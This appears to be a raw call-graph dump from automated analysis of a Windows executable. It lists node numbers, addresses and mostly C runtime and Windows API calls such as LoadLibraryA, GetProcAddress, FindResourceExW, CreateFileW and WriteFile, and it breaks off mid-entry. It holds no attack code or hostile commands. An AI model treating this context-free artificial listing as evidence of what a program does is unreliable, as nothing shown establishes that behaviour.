98971->98974 98972->98974 99514 f88d3b 59 API calls Mailbox 98972->99514 98975 f89158 98974->98975 98976 f891a0 98974->98976 98979 f8915f 98974->98979 98977 fa0ff6 Mailbox 59 API calls 98975->98977 99513 f89e9c 60 API calls Mailbox 98976->99513 98977->98979 98979->98762 98981 f85045 85 API calls 98980->98981 98982 fe9854 98981->98982 99515 fe99be 98982->99515 98985 f8506b 74 API calls 98986 fe9881 98985->98986 98987 f8506b 74 API calls 98986->98987 98988 fe9891 98987->98988 98989 f8506b 74 API calls 98988->98989 98990 fe98ac 98989->98990 98991 f8506b 74 API calls 98990->98991 98992 fe98c7 98991->98992 98993 f85045 85 API calls 98992->98993 98994 fe98de 98993->98994 98995 fa594c __malloc_crt 58 API calls 98994->98995 98996 fe98e5 98995->98996 98997 fa594c __malloc_crt 58 API calls 98996->98997 98998 fe98ef 98997->98998 98999 f8506b 74 API calls 98998->98999 99000 fe9903 98999->99000 99001 fe9393 GetSystemTimeAsFileTime 99000->99001 99002 fe9916 99001->99002 99003 fe992b 99002->99003 99004 fe9940 99002->99004 99005 fa2f95 _free 58 API calls 99003->99005 99006 fe9946 99004->99006 99007 fe99a5 99004->99007 99008 fe9931 99005->99008 99521 fe8d90 99006->99521 99010 fa2f95 _free 58 API calls 99007->99010 99011 fa2f95 _free 58 API calls 99008->99011 99014 fbd3c1 99010->99014 99011->99014 99013 fa2f95 _free 58 API calls 99013->99014 99014->98700 99015 f84faa 99014->99015 99016 f84fb4 99015->99016 99018 f84fbb 99015->99018 99017 fa55d6 __fcloseall 83 API calls 99016->99017 99017->99018 99019 f84fca 99018->99019 99020 f84fdb FreeLibrary 99018->99020 99019->98700 99020->99019 99022 f87faf 59 API calls 99021->99022 99023 f87b5d 99022->99023 99023->98899 99073 f84d61 99024->99073 99027 f84d61 2 API calls 99030 f84d3a 99027->99030 99028 f84d4a FreeLibrary 99029 f84d53 99028->99029 99031 fa548b 99029->99031 99030->99028 99030->99029 99077 fa54a0 99031->99077 99033 f84f5c 99033->98914 99033->98915 99235 f84d94 99034->99235 99037 f84ced 99039 f84d08 99037->99039 99040 f84cff FreeLibrary 99037->99040 99038 f84d94 2 API calls 99038->99037 99041 f84dd0 99039->99041 99040->99039 99042 fa0ff6 Mailbox 59 API calls 99041->99042 99043 f84de5 99042->99043 99044 f8538e 59 API calls 99043->99044 99045 f84df1 _memmove 99044->99045 99046 f84e2c 99045->99046 99047 f84ee9 99045->99047 99048 f84f21 99045->99048 99049 f85027 69 API calls 99046->99049 99239 f84fe9 CreateStreamOnHGlobal 99047->99239 99250 fe9ba5 95 API calls 99048->99250 99052 f84e35 99049->99052 99053 f8506b 74 API calls 99052->99053 99055 f84ec9 99052->99055 99056 fbdcd0 99052->99056 99245 f85045 99052->99245 99053->99052 99055->98923 99057 f85045 85 API calls 99056->99057 99058 fbdce4 99057->99058 99059 f8506b 74 API calls 99058->99059 99059->99055 99061 f8507d 99060->99061 99062 fbddf6 99060->99062 99274 fa5812 99061->99274 99065 fe9393 99472 fe91e9 99065->99472 99067 fe93a9 99067->98930 99069 fbddb9 99068->99069 99070 f85036 99068->99070 99477 fa5e90 99070->99477 99072 f8503e 99072->98932 99074 f84d2e 99073->99074 99075 f84d6a LoadLibraryA 99073->99075 99074->99027 99074->99030 99075->99074 99076 f84d7b GetProcAddress 99075->99076 99076->99074 99080 fa54ac __write 99077->99080 99078 fa54bf 99126 fa8d68 58 API calls __getptd_noexit 99078->99126 99080->99078 99082 fa54f0 99080->99082 99081 fa54c4 99127 fa8ff6 9 API calls __write 99081->99127 99096 fb0738 99082->99096 99085 fa54f5 99086 fa550b 99085->99086 99087 fa54fe 99085->99087 99089 fa5535 99086->99089 99090 fa5515 99086->99090 99128 fa8d68 58 API calls __getptd_noexit 99087->99128 99111 fb0857 99089->99111 99129 fa8d68 58 API calls __getptd_noexit 99090->99129 99094 fa54cf __write @_EH4_CallFilterFunc@8 99094->99033 99097 fb0744 __write 99096->99097 99098 fa9e4b __lock 58 API calls 99097->99098 99108 fb0752 99098->99108 99099 fb07c6 99131 fb084e 99099->99131 99100 fb07cd 99136 fa8a5d 58 API calls 2 library calls 99100->99136 99103 fb0843 __write 99103->99085 99104 fb07d4 99104->99099 99137 faa06b InitializeCriticalSectionAndSpinCount 99104->99137 99107 fa9ed3 __mtinitlocknum 58 API calls 99107->99108 99108->99099 99108->99100 99108->99107 99134 fa6e8d 59 API calls __lock 99108->99134 99135 fa6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99108->99135 99109 fb07fa EnterCriticalSection 99109->99099 99112 fb0877 __wopenfile 99111->99112 99113 fb0891 99112->99113 99125 fb0a4c 99112->99125 99144 fa3a0b 60 API calls 2 library calls 99112->99144 99142 fa8d68 58 API calls __getptd_noexit 99113->99142 99115 fb0896 99143 fa8ff6 9 API calls __write 99115->99143 99117 fa5540 99130 fa5562 LeaveCriticalSection LeaveCriticalSection _fseek 99117->99130 99118 fb0aaf 99139 fb87f1 99118->99139 99121 fb0a45 99121->99125 99145 fa3a0b 60 API calls 2 library calls 99121->99145 99123 fb0a64 99123->99125 99146 fa3a0b 60 API calls 2 library calls 99123->99146 99125->99113 99125->99118 99126->99081 99127->99094 99128->99094 99129->99094 99130->99094 99138 fa9fb5 LeaveCriticalSection 99131->99138 99133 fb0855 99133->99103 99134->99108 99135->99108 99136->99104 99137->99109 99138->99133 99147 fb7fd5 99139->99147 99141 fb880a 99141->99117 99142->99115 99143->99117 99144->99121 99145->99123 99146->99125 99149 fb7fe1 __write 99147->99149 99148 fb7ff7 99232 fa8d68 58 API calls __getptd_noexit 99148->99232 99149->99148 99151 fb802d 99149->99151 99158 fb809e 99151->99158 99152 fb7ffc 99233 fa8ff6 9 API calls __write 99152->99233 99155 fb8049 99234 fb8072 LeaveCriticalSection __unlock_fhandle 99155->99234 99157 fb8006 __write 99157->99141 99159 fb80be 99158->99159 99160 fa471a __wsopen_nolock 58 API calls 99159->99160 99163 fb80da 99160->99163 99161 fa9006 __invoke_watson 8 API calls 99162 fb87f0 99161->99162 99165 fb7fd5 __wsopen_helper 103 API calls 99162->99165 99164 fb8114 99163->99164 99172 fb8137 99163->99172 99231 fb8211 99163->99231 99166 fa8d34 __write 58 API calls 99164->99166 99167 fb880a 99165->99167 99168 fb8119 99166->99168 99167->99155 99169 fa8d68 __write 58 API calls 99168->99169 99170 fb8126 99169->99170 99173 fa8ff6 __write 9 API calls 99170->99173 99171 fb81f5 99174 fa8d34 __write 58 API calls 99171->99174 99172->99171 99179 fb81d3 99172->99179 99175 fb8130 99173->99175 99176 fb81fa 99174->99176 99175->99155 99177 fa8d68 __write 58 API calls 99176->99177 99178 fb8207 99177->99178 99180 fa8ff6 __write 9 API calls 99178->99180 99181 fad4d4 __alloc_osfhnd 61 API calls 99179->99181 99180->99231 99182 fb82a1 99181->99182 99183 fb82ab 99182->99183 99184 fb82ce 99182->99184 99185 fa8d34 __write 58 API calls 99183->99185 99186 fb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99184->99186 99187 fb82b0 99185->99187 99197 fb82f0 99186->99197 99188 fa8d68 __write 58 API calls 99187->99188 99190 fb82ba 99188->99190 99189 fb836e GetFileType 99191 fb83bb 99189->99191 99192 fb8379 GetLastError 99189->99192 99195 fa8d68 __write 58 API calls 99190->99195 99201 fad76a __set_osfhnd 59 API calls 99191->99201 99196 fa8d47 __dosmaperr 58 API calls 99192->99196 99193 fb833c GetLastError 99194 fa8d47 __dosmaperr 58 API calls 99193->99194 99198 fb8361 99194->99198 99195->99175 99199 fb83a0 CloseHandle 99196->99199 99197->99189 99197->99193 99200 fb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99197->99200 99204 fa8d68 __write 58 API calls 99198->99204 99199->99198 99202 fb83ae 99199->99202 99203 fb8331 99200->99203 99207 fb83d9 99201->99207 99205 fa8d68 __write 58 API calls 99202->99205 99203->99189 99203->99193 99204->99231 99206 fb83b3 99205->99206 99206->99198 99208 fb8594 99207->99208 99209 fb1b11 __lseeki64_nolock 60 API calls 99207->99209 99228 fb845a 99207->99228 99210 fb8767 CloseHandle 99208->99210 99208->99231 99211 fb8443 99209->99211 99212 fb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99210->99212 99214 fa8d34 __write 58 API calls 99211->99214 99211->99228 99213 fb878e 99212->99213 99215 fb87c2 99213->99215 99216 fb8796 GetLastError 99213->99216 99214->99228 99215->99231 99217 fa8d47 __dosmaperr 58 API calls 99216->99217 99219 fb87a2 99217->99219 99218 fb848c 99222 fb99f2 __chsize_nolock 82 API calls 99218->99222 99218->99228 99223 fad67d __free_osfhnd 59 API calls 99219->99223 99220 fb10ab 70 API calls __read_nolock 99220->99228 99221 fb0d2d __close_nolock 61 API calls 99221->99228 99222->99218 99223->99215 99224 fadac6 __write 78 API calls 99224->99228 99225 fb8611 99226 fb0d2d __close_nolock 61 API calls 99225->99226 99227 fb8618 99226->99227 99230 fa8d68 __write 58 API calls 99227->99230 99228->99208 99228->99218 99228->99220 99228->99221 99228->99224 99228->99225 99229 fb1b11 60 API calls __lseeki64_nolock 99228->99229 99229->99228 99230->99231 99231->99161 99232->99152 99233->99157 99234->99157 99236 f84ce1 99235->99236 99237 f84d9d LoadLibraryA 99235->99237 99236->99037 99236->99038 99237->99236 99238 f84dae GetProcAddress 99237->99238 99238->99236 99240 f85003 FindResourceExW 99239->99240 99244 f85020 99239->99244 99241 fbdd5c LoadResource 99240->99241 99240->99244 99242 fbdd71 SizeofResource 99241->99242 99241->99244 99243 fbdd85 LockResource 99242->99243 99242->99244 99243->99244 99244->99046 99246 f85054 99245->99246 99247 fbddd4 99245->99247 99251 fa5a7d 99246->99251 99249 f85062 99249->99052 99250->99046 99255 fa5a89 __write 99251->99255 99252 fa5a9b 99264 fa8d68 58 API calls __getptd_noexit 99252->99264 99254 fa5ac1 99266 fa6e4e 99254->99266 99255->99252 99255->99254 99257 fa5aa0 99265 fa8ff6 9 API calls __write 99257->99265 99258 fa5ac7 99272 fa59ee 83 API calls 4 library calls 99258->99272 99261 fa5ad6 99273 fa5af8 LeaveCriticalSection LeaveCriticalSection _fseek 99261->99273 99263 fa5aab __write 99263->99249 99264->99257 99265->99263 99267 fa6e5e 99266->99267 99268 fa6e80 EnterCriticalSection 99266->99268 99267->99268 99269 fa6e66 99267->99269 99270 fa6e76 99268->99270 99271 fa9e4b __lock 58 API calls 99269->99271 99270->99258 99271->99270 99272->99261 99273->99263 99277 fa582d 99274->99277 99276 f8508e 99276->99065 99278 fa5839 __write 99277->99278 99279 fa587c 99278->99279 99280 fa5874 __write 99278->99280 99284 fa584f _memset 99278->99284 99281 fa6e4e __lock_file 59 API calls 99279->99281 99280->99276 99283 fa5882 99281->99283 99290 fa564d 99283->99290 99304 fa8d68 58 API calls __getptd_noexit 99284->99304 99285 fa5869 99305 fa8ff6 9 API calls __write 99285->99305 99294 fa5668 _memset 99290->99294 99297 fa5683 99290->99297 99291 fa5673 99402 fa8d68 58 API calls __getptd_noexit 99291->99402 99293 fa5678 99403 fa8ff6 9 API calls __write 99293->99403 99294->99291 99294->99297 99302 fa56c3 99294->99302 99306 fa58b6 LeaveCriticalSection LeaveCriticalSection _fseek 99297->99306 99298 fa57d4 _memset 99405 fa8d68 58 API calls __getptd_noexit 99298->99405 99302->99297 99302->99298 99307 fa4916 99302->99307 99314 fb10ab 99302->99314 99382 fb0df7 99302->99382 99404 fb0f18 58 API calls 3 library calls 99302->99404 99304->99285 99305->99280 99306->99280 99308 fa4920 99307->99308 99309 fa4935 99307->99309 99406 fa8d68 58 API calls __getptd_noexit 99308->99406 99309->99302 99311 fa4925 99407 fa8ff6 9 API calls __write 99311->99407 99313 fa4930 99313->99302 99315 fb10cc 99314->99315 99316 fb10e3 99314->99316 99417 fa8d34 58 API calls __getptd_noexit 99315->99417 99318 fb181b 99316->99318 99323 fb111d 99316->99323 99433 fa8d34 58 API calls __getptd_noexit 99318->99433 99320 fb10d1 99418 fa8d68 58 API calls __getptd_noexit 99320->99418 99321 fb1820 99434 fa8d68 58 API calls __getptd_noexit 99321->99434 99324 fb1125 99323->99324 99330 fb113c 99323->99330 99419 fa8d34 58 API calls __getptd_noexit 99324->99419 99327 fb1131 99435 fa8ff6 9 API calls __write 99327->99435 99328 fb112a 99420 fa8d68 58 API calls __getptd_noexit 99328->99420 99331 fb1151 99330->99331 99334 fb116b 99330->99334 99335 fb1189 99330->99335 99362 fb10d8 99330->99362 99421 fa8d34 58 API calls __getptd_noexit 99331->99421 99334->99331 99337 fb1176 99334->99337 99422 fa8a5d 58 API calls 2 library calls 99335->99422 99408 fb5ebb 99337->99408 99338 fb1199 99340 fb11bc 99338->99340 99341 fb11a1 99338->99341 99425 fb1b11 60 API calls 3 library calls 99340->99425 99423 fa8d68 58 API calls __getptd_noexit 99341->99423 99342 fb128a 99344 fb1303 ReadFile 99342->99344 99349 fb12a0 GetConsoleMode 99342->99349 99347 fb17e3 GetLastError 99344->99347 99348 fb1325 99344->99348 99346 fb11a6 99424 fa8d34 58 API calls __getptd_noexit 99346->99424 99351 fb17f0 99347->99351 99352 fb12e3 99347->99352 99348->99347 99356 fb12f5 99348->99356 99353 fb1300 99349->99353 99354 fb12b4 99349->99354 99431 fa8d68 58 API calls __getptd_noexit 99351->99431 99365 fb12e9 99352->99365 99426 fa8d47 58 API calls 2 library calls 99352->99426 99353->99344 99354->99353 99357 fb12ba ReadConsoleW 99354->99357 99364 fb15c7 99356->99364 99356->99365 99367 fb135a 99356->99367 99357->99356 99358 fb12dd GetLastError 99357->99358 99358->99352 99360 fb17f5 99432 fa8d34 58 API calls __getptd_noexit 99360->99432 99362->99302 99363 fa2f95 _free 58 API calls 99363->99362 99364->99365 99369 fb16cd ReadFile 99364->99369 99365->99362 99365->99363 99368 fb13c6 ReadFile 99367->99368 99374 fb1447 99367->99374 99370 fb13e7 GetLastError 99368->99370 99378 fb13f1 99368->99378 99373 fb16f0 GetLastError 99369->99373 99380 fb16fe 99369->99380 99370->99378 99371 fb1504 99376 fb14b4 MultiByteToWideChar 99371->99376 99429 fb1b11 60 API calls 3 library calls 99371->99429 99372 fb14f4 99428 fa8d68 58 API calls __getptd_noexit 99372->99428 99373->99380 99374->99365 99374->99371 99374->99372 99374->99376 99376->99358 99376->99365 99378->99367 99427 fb1b11 60 API calls 3 library calls 99378->99427 99380->99364 99430 fb1b11 60 API calls 3 library calls 99380->99430 99383 fb0e02 99382->99383 99387 fb0e17 99382->99387 99469 fa8d68 58 API calls __getptd_noexit 99383->99469 99385 fb0e07 99470 fa8ff6 9 API calls __write 99385->99470 99388 fb0e4c 99387->99388 99393 fb0e12 99387->99393 99471 fb6234 58 API calls __malloc_crt 99387->99471 99390 fa4916 __fclose_nolock 58 API calls 99388->99390 99391 fb0e60 99390->99391 99436 fb0f97 99391->99436 99393->99302 99394 fb0e67 99394->99393 99395 fa4916 __fclose_nolock 58 API calls 99394->99395 99396 fb0e8a 99395->99396 99396->99393 99397 fa4916 __fclose_nolock 58 API calls 99396->99397 99398 fb0e96 99397->99398 99398->99393 99399 fa4916 __fclose_nolock 58 API calls 99398->99399 99400 fb0ea3 99399->99400 99401 fa4916 __fclose_nolock 58 API calls 99400->99401 99401->99393 99402->99293 99403->99297 99404->99302 99405->99293 99406->99311 99407->99313 99409 fb5ed3 99408->99409 99410 fb5ec6 99408->99410 99412 fa8d68 __write 58 API calls 99409->99412 99414 fb5edf 99409->99414 99411 fa8d68 __write 58 API calls 99410->99411 99413 fb5ecb 99411->99413 99415 fb5f00 99412->99415 99413->99342 99414->99342 99416 fa8ff6 __write 9 API calls 99415->99416 99416->99413 99417->99320 99418->99362 99419->99328 99420->99327 99421->99328 99422->99338 99423->99346 99424->99362 99425->99337 99426->99365 99427->99378 99428->99365 99429->99376 99430->99380 99431->99360 99432->99365 99433->99321 99434->99327 99435->99362 99437 fb0fa3 __write 99436->99437 99438 fb0fb0 99437->99438 99439 fb0fc7 99437->99439 99440 fa8d34 __write 58 API calls 99438->99440 99441 fb108b 99439->99441 99444 fb0fdb 99439->99444 99443 fb0fb5 99440->99443 99442 fa8d34 __write 58 API calls 99441->99442 99450 fb0ffe 99442->99450 99445 fa8d68 __write 58 API calls 99443->99445 99446 fb0ff9 99444->99446 99447 fb1006 99444->99447 99461 fb0fbc __write 99445->99461 99451 fa8d34 __write 58 API calls 99446->99451 99448 fb1028 99447->99448 99449 fb1013 99447->99449 99453 fad446 ___lock_fhandle 59 API calls 99448->99453 99452 fa8d34 __write 58 API calls 99449->99452 99454 fa8d68 __write 58 API calls 99450->99454 99451->99450 99455 fb1018 99452->99455 99456 fb102e 99453->99456 99457 fb1020 99454->99457 99458 fa8d68 __write 58 API calls 99455->99458 99459 fb1041 99456->99459 99460 fb1054 99456->99460 99463 fa8ff6 __write 9 API calls 99457->99463 99458->99457 99462 fb10ab __read_nolock 70 API calls 99459->99462 99464 fa8d68 __write 58 API calls 99460->99464 99461->99394 99465 fb104d 99462->99465 99463->99461 99466 fb1059 99464->99466 99468 fb1083 __read LeaveCriticalSection 99465->99468 99467 fa8d34 __write 58 API calls 99466->99467 99467->99465 99468->99461 99469->99385 99470->99393 99471->99388 99475 fa543a GetSystemTimeAsFileTime 99472->99475 99474 fe91f8 99474->99067 99476 fa5468 __aulldiv 99475->99476 99476->99474 99478 fa5e9c __write 99477->99478 99479 fa5eae 99478->99479 99480 fa5ec3 99478->99480 99491 fa8d68 58 API calls __getptd_noexit 99479->99491 99482 fa6e4e __lock_file 59 API calls 99480->99482 99484 fa5ec9 99482->99484 99483 fa5eb3 99492 fa8ff6 9 API calls __write 99483->99492 99493 fa5b00 67 API calls 5 library calls 99484->99493 99487 fa5ebe __write 99487->99072 99488 fa5ed4 99494 fa5ef4 LeaveCriticalSection LeaveCriticalSection _fseek 99488->99494 99490 fa5ee6 99490->99487 99491->99483 99492->99487 99493->99488 99494->99490 99496 f880fa _memmove 99495->99496 99497 f880e7 99495->99497 99496->98934 99497->99496 99498 fa0ff6 Mailbox 59 API calls 99497->99498 99498->99496 99499->98943 99500->98956 99501->98958 99502->98955 99503->98964 99505 f892c9 Mailbox 99504->99505 99506 fbf5c8 99505->99506 99511 f892d3 99505->99511 99507 fa0ff6 Mailbox 59 API calls 99506->99507 99509 fbf5d4 99507->99509 99508 f892da 99508->98968 99511->99508 99512 f89df0 59 API calls Mailbox 99511->99512 99512->99511 99513->98979 99514->98974 99520 fe99d2 __tzset_nolock _wcscmp 99515->99520 99516 fe9866 99516->98985 99516->99014 99517 fe9393 GetSystemTimeAsFileTime 99517->99520 99518 f8506b 74 API calls 99518->99520 99519 f85045 85 API calls 99519->99520 99520->99516 99520->99517 99520->99518 99520->99519 99522 fe8da9 99521->99522 99523 fe8d9b 99521->99523 99525 fe8dee 99522->99525 99526 fa548b 115 API calls 99522->99526 99535 fe8db2 99522->99535 99524 fa548b 115 API calls 99523->99524 99524->99522 99552 fe901b 99525->99552 99527 fe8dd3 99526->99527 99527->99525 99529 fe8ddc 99527->99529 99533 fa55d6 __fcloseall 83 API calls 99529->99533 99529->99535 99530 fe8e32 99531 fe8e36 99530->99531 99532 fe8e57 99530->99532 99537 fa55d6 __fcloseall 83 API calls 99531->99537 99540 fe8e43 99531->99540 99556 fe8c33 99532->99556 99533->99535 99535->99013 99537->99540 99538 fa55d6 __fcloseall 83 API calls 99538->99535 99539 fe8e85 99565 fe8eb5 99539->99565 99540->99535 99540->99538 99542 fe8e65 99543 fe8e72 99542->99543 99545 fa55d6 __fcloseall 83 API calls 99542->99545 99543->99535 99547 fa55d6 __fcloseall 83 API calls 99543->99547 99545->99543 99547->99535 99549 fe8ea0 99549->99535 99551 fa55d6 __fcloseall 83 API calls 99549->99551 99551->99535 99553 fe9040 99552->99553 99555 fe9029 __tzset_nolock _memmove 99552->99555 99554 fa5812 __fread_nolock 74 API calls 99553->99554 99554->99555 99555->99530 99557 fa594c __malloc_crt 58 API calls 99556->99557 99558 fe8c42 99557->99558 99559 fa594c __malloc_crt 58 API calls 99558->99559 99560 fe8c56 99559->99560 99561 fa594c __malloc_crt 58 API calls 99560->99561 99562 fe8c6a 99561->99562 99563 fe8f97 58 API calls 99562->99563 99564 fe8c7d 99562->99564 99563->99564 99564->99539 99564->99542 99569 fe8eca 99565->99569 99566 fe8f82 99598 fe91bf 99566->99598 99568 fe8c8f 74 API calls 99568->99569 99569->99566 99569->99568 99572 fe8e8c 99569->99572 99594 fe909c 99569->99594 99602 fe8d2b 74 API calls 99569->99602 99573 fe8f97 99572->99573 99574 fe8faa 99573->99574 99575 fe8fa4 99573->99575 99577 fe8fbb 99574->99577 99578 fa2f95 _free 58 API calls 99574->99578 99576 fa2f95 _free 58 API calls 99575->99576 99576->99574 99579 fa2f95 _free 58 API calls 99577->99579 99580 fe8e93 99577->99580 99578->99577 99579->99580 99580->99549 99581 fa55d6 99580->99581 99582 fa55e2 __write 99581->99582 99583 fa560e 99582->99583 99584 fa55f6 99582->99584 99587 fa6e4e __lock_file 59 API calls 99583->99587 99590 fa5606 __write 99583->99590 99651 fa8d68 58 API calls __getptd_noexit 99584->99651 99586 fa55fb 99652 fa8ff6 9 API calls __write 99586->99652 99589 fa5620 99587->99589 99635 fa556a 99589->99635 99590->99549 99595 fe90ab 99594->99595 99596 fe90eb 99594->99596 99595->99569 99596->99595 99603 fe9172 99596->99603 99599 fe91cc 99598->99599 99600 fe91dd 99598->99600 99601 fa4a93 80 API calls 99599->99601 99600->99572 99601->99600 99602->99569 99604 fe919e 99603->99604 99605 fe91af 99603->99605 99607 fa4a93 99604->99607 99605->99596 99608 fa4a9f __write 99607->99608 99609 fa4abd 99608->99609 99610 fa4ad5 99608->99610 99612 fa4acd __write 99608->99612 99632 fa8d68 58 API calls __getptd_noexit 99609->99632 99613 fa6e4e __lock_file 59 API calls 99610->99613 99612->99605 99615 fa4adb 99613->99615 99614 fa4ac2 99633 fa8ff6 9 API calls __write 99614->99633 99620 fa493a 99615->99620 99623 fa4949 99620->99623 99626 fa4967 99620->99626 99621 fa4957 99622 fa8d68 __write 58 API calls 99621->99622 99624 fa495c 99622->99624 99623->99621 99623->99626 99630 fa4981 _memmove 99623->99630 99625 fa8ff6 __write 9 API calls 99624->99625 99625->99626 99634 fa4b0d LeaveCriticalSection LeaveCriticalSection _fseek 99626->99634 99627 fab05e __flsbuf 78 API calls 99627->99630 99628 fa4c6d __flush 78 API calls 99628->99630 99629 fa4916 __fclose_nolock 58 API calls 99629->99630 99630->99626 99630->99627 99630->99628 99630->99629 99631 fadac6 __write 78 API calls 99630->99631 99631->99630 99632->99614 99633->99612 99634->99612 99636 fa5579 99635->99636 99637 fa558d 99635->99637 99690 fa8d68 58 API calls __getptd_noexit 99636->99690 99638 fa5589 99637->99638 99654 fa4c6d 99637->99654 99653 fa5645 LeaveCriticalSection LeaveCriticalSection _fseek 99638->99653 99641 fa557e 99691 fa8ff6 9 API calls __write 99641->99691 99646 fa4916 __fclose_nolock 58 API calls 99647 fa55a7 99646->99647 99664 fb0c52 99647->99664 99649 fa55ad 99649->99638 99650 fa2f95 _free 58 API calls 99649->99650 99650->99638 99651->99586 99652->99590 99653->99590 99655 fa4c80 99654->99655 99656 fa4ca4 99654->99656 99655->99656 99657 fa4916 __fclose_nolock 58 API calls 99655->99657 99660 fb0dc7 99656->99660 99658 fa4c9d 99657->99658 99692 fadac6 99658->99692 99661 fb0dd4 99660->99661 99663 fa55a1 99660->99663 99662 fa2f95 _free 58 API calls 99661->99662 99661->99663 99662->99663 99663->99646 99665 fb0c5e __write 99664->99665 99666 fb0c6b 99665->99666 99667 fb0c82 99665->99667 99817 fa8d34 58 API calls __getptd_noexit 99666->99817 99668 fb0d0d 99667->99668 99671 fb0c92 99667->99671 99822 fa8d34 58 API calls __getptd_noexit 99668->99822 99670 fb0c70 99818 fa8d68 58 API calls __getptd_noexit 99670->99818 99674 fb0cba 99671->99674 99675 fb0cb0 99671->99675 99679 fad446 ___lock_fhandle 59 API calls 99674->99679 99819 fa8d34 58 API calls __getptd_noexit 99675->99819 99676 fb0cb5 99823 fa8d68 58 API calls __getptd_noexit 99676->99823 99677 fb0c77 __write 99677->99649 99681 fb0cc0 99679->99681 99683 fb0cde 99681->99683 99684 fb0cd3 99681->99684 99682 fb0d19 99824 fa8ff6 9 API calls __write 99682->99824 99820 fa8d68 58 API calls __getptd_noexit 99683->99820 99802 fb0d2d 99684->99802 99688 fb0cd9 99821 fb0d05 LeaveCriticalSection __unlock_fhandle 99688->99821 99690->99641 99691->99638 99693 fadad2 __write 99692->99693 99694 fadadf 99693->99694 99695 fadaf6 99693->99695 99793 fa8d34 58 API calls __getptd_noexit 99694->99793 99697 fadb95 99695->99697 99699 fadb0a 99695->99699 99799 fa8d34 58 API calls __getptd_noexit 99697->99799 99698 fadae4 99794 fa8d68 58 API calls __getptd_noexit 99698->99794 99702 fadb28 99699->99702 99703 fadb32 99699->99703 99795 fa8d34 58 API calls __getptd_noexit 99702->99795 99720 fad446 99703->99720 99704 fadb2d 99800 fa8d68 58 API calls __getptd_noexit 99704->99800 99707 fadb38 99709 fadb4b 99707->99709 99710 fadb5e 99707->99710 99729 fadbb5 99709->99729 99796 fa8d68 58 API calls __getptd_noexit 99710->99796 99711 fadba1 99801 fa8ff6 9 API calls __write 99711->99801 99712 fadaeb __write 99712->99656 99716 fadb57 99798 fadb8d LeaveCriticalSection __unlock_fhandle 99716->99798 99717 fadb63 99797 fa8d34 58 API calls __getptd_noexit 99717->99797 99721 fad452 __write 99720->99721 99722 fad4a1 EnterCriticalSection 99721->99722 99724 fa9e4b __lock 58 API calls 99721->99724 99723 fad4c7 __write 99722->99723 99723->99707 99725 fad477 99724->99725 99726 fad48f 99725->99726 99727 faa06b __ioinit InitializeCriticalSectionAndSpinCount 99725->99727 99728 fad4cb ___lock_fhandle LeaveCriticalSection 99726->99728 99727->99726 99728->99722 99730 fadbc2 __write_nolock 99729->99730 99731 fadc20 99730->99731 99732 fadc01 99730->99732 99763 fadbf6 99730->99763 99737 fadc78 99731->99737 99738 fadc5c 99731->99738 99734 fa8d34 __write 58 API calls 99732->99734 99733 fac836 __wtof_l 6 API calls 99735 fae416 99733->99735 99736 fadc06 99734->99736 99735->99716 99739 fa8d68 __write 58 API calls 99736->99739 99740 fadc91 99737->99740 99744 fb1b11 __lseeki64_nolock 60 API calls 99737->99744 99741 fa8d34 __write 58 API calls 99738->99741 99743 fadc0d 99739->99743 99745 fb5ebb __flsbuf 58 API calls 99740->99745 99742 fadc61 99741->99742 99746 fa8d68 __write 58 API calls 99742->99746 99747 fa8ff6 __write 9 API calls 99743->99747 99744->99740 99748 fadc9f 99745->99748 99749 fadc68 99746->99749 99747->99763 99750 fadff8 99748->99750 99756 fa9bec __beginthreadex 58 API calls 99748->99756 99753 fa8ff6 __write 9 API calls 99749->99753 99751 fae38b WriteFile 99750->99751 99752 fae016 99750->99752 99754 fadfeb GetLastError 99751->99754 99765 fadfb8 99751->99765 99755 fae13a 99752->99755 99762 fae02c 99752->99762 99753->99763 99754->99765 99766 fae22f 99755->99766 99768 fae145 99755->99768 99757 fadccb GetConsoleMode 99756->99757 99757->99750 99759 fadd0a 99757->99759 99758 fae3c4 99758->99763 99764 fa8d68 __write 58 API calls 99758->99764 99759->99750 99760 fadd1a GetConsoleCP 99759->99760 99760->99758 99788 fadd49 99760->99788 99761 fae09b WriteFile 99761->99754 99767 fae0d8 99761->99767 99762->99758 99762->99761 99763->99733 99769 fae3f2 99764->99769 99765->99758 99765->99763 99770 fae118 99765->99770 99766->99758 99771 fae2a4 WideCharToMultiByte 99766->99771 99767->99762 99772 fae0fc 99767->99772 99768->99758 99773 fae1aa WriteFile 99768->99773 99774 fa8d34 __write 58 API calls 99769->99774 99775 fae3bb 99770->99775 99776 fae123 99770->99776 99771->99754 99786 fae2eb 99771->99786 99772->99765 99773->99754 99779 fae1f9 99773->99779 99774->99763 99778 fa8d47 __dosmaperr 58 API calls 99775->99778 99777 fa8d68 __write 58 API calls 99776->99777 99780 fae128 99777->99780 99778->99763 99779->99765 99779->99768 99779->99772 99782 fa8d34 __write 58 API calls 99780->99782 99781 fae2f3 WriteFile 99784 fae346 GetLastError 99781->99784 99781->99786 99782->99763 99783 fa3835 __write_nolock 58 API calls 99783->99788 99784->99786 99785 fb650a 60 API calls __write_nolock 99785->99788 99786->99765 99786->99766 99786->99772 99786->99781 99787 fb7cae WriteConsoleW CreateFileW __putwch_nolock 99790 fade9f 99787->99790 99788->99765 99788->99783 99788->99785 99789 fade32 WideCharToMultiByte 99788->99789 99788->99790 99789->99765 99791 fade6d WriteFile 99789->99791 99790->99754 99790->99765 99790->99787 99790->99788 99792 fadec7 WriteFile 99790->99792 99791->99754 99791->99790 99792->99754 99792->99790 99793->99698 99794->99712 99795->99704 99796->99717 99797->99716 99798->99712 99799->99704 99800->99711 99801->99712 99825 fad703 99802->99825 99804 fb0d91 99838 fad67d 59 API calls __write 99804->99838 99806 fb0d3b 99806->99804 99809 fad703 __close_nolock 58 API calls 99806->99809 99816 fb0d6f 99806->99816 99807 fad703 __close_nolock 58 API calls 99810 fb0d7b CloseHandle 99807->99810 99808 fb0d99 99815 fb0dbb 99808->99815 99839 fa8d47 58 API calls 2 library calls 99808->99839 99811 fb0d66 99809->99811 99810->99804 99812 fb0d87 GetLastError 99810->99812 99814 fad703 __close_nolock 58 API calls 99811->99814 99812->99804 99814->99816 99815->99688 99816->99804 99816->99807 99817->99670 99818->99677 99819->99676 99820->99688 99821->99677 99822->99676 99823->99682 99824->99677 99826 fad70e 99825->99826 99827 fad723 99825->99827 99828 fa8d34 __write 58 API calls 99826->99828 99830 fa8d34 __write 58 API calls 